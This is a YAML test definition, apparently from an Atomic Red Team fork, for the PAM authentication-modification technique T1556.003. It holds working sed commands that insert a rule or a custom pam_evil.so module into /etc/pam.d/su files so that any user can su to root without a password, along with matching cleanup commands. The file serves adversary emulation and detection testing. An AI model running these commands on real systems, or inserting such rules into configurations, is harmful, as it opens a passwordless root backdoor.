adam/atomic-red-team-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
62a85c12b51a6d903a8357cb91b555ff1b203fd3
atomic-red-team-gs/atomics/T1556.003/T1556.003.yaml
T
Hare Sudhan 62a85c12b5 FreeBSD changes (#2585) 
* freebsd changes

* renaming freebsd to linux
2023-11-06 17:41:43 -05:00

110 lines
3.7 KiB
YAML
Raw Blame History

attack_technique: T1556.003
display_name: 'Modify Authentication Process: Pluggable Authentication Modules'
atomic_tests:
- name: Malicious PAM rule
auto_generated_guid: 4b9dde80-ae22-44b1-a82a-644bf009eb9c
description: |
Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
supported_platforms:
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
type: string
default: /etc/pam.d/su-l
pam_rule:
description: Rule to add to the PAM config.
type: string
default: auth sufficient pam_succeed_if.so uid >= 0
index:
description: Index where the rule is inserted.
type: integer
default: 1
executor:
name: sh
elevation_required: true
command: |
sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
cleanup_command: |
sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
- name: Malicious PAM rule (freebsd)
auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3
description: |
Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
supported_platforms:
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
type: string
default: /etc/pam.d/su
pam_rule:
description: Rule to add to the PAM config.
type: string
default: auth sufficient pam_succeed_if.so uid >= 0
index:
description: Index where the rule is inserted.
type: integer
default: 8
executor:
name: sh
elevation_required: true
command: |
sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
cleanup_command: |
sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf}
- name: Malicious PAM module
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
description: |
Creates a PAM module, inserts a rule to use it, and then tests it.
Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
supported_platforms:
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
type: string
default: /etc/pam.d/su-l
pam_rule:
description: Rule to add to the PAM config.
type: string
default: auth sufficient /tmp/pam_evil.so
index:
description: Index where the rule is inserted.
type: integer
default: 1
path_to_pam_module_source:
description: Path to PAM module source code.
type: path
default: PathToAtomicsFolder/T1556.003/src/pam_evil.c
path_to_pam_module:
description: Path to PAM module object
type: path
default: /tmp/pam_evil.so
dependencies:
- description: |
The PAM development library must be installed to build the PAM module
prereq_command: |
if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi;
get_prereq_command: |
if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi
- description: |
The PAM module must exist on disk at specified location (#{path_to_pam_module})
prereq_command: |
if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi;
get_prereq_command: |
sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
executor:
name: sh
elevation_required: true
command: |
sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
cleanup_command: |
sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
Reference in New Issue View Git Blame Copy Permalink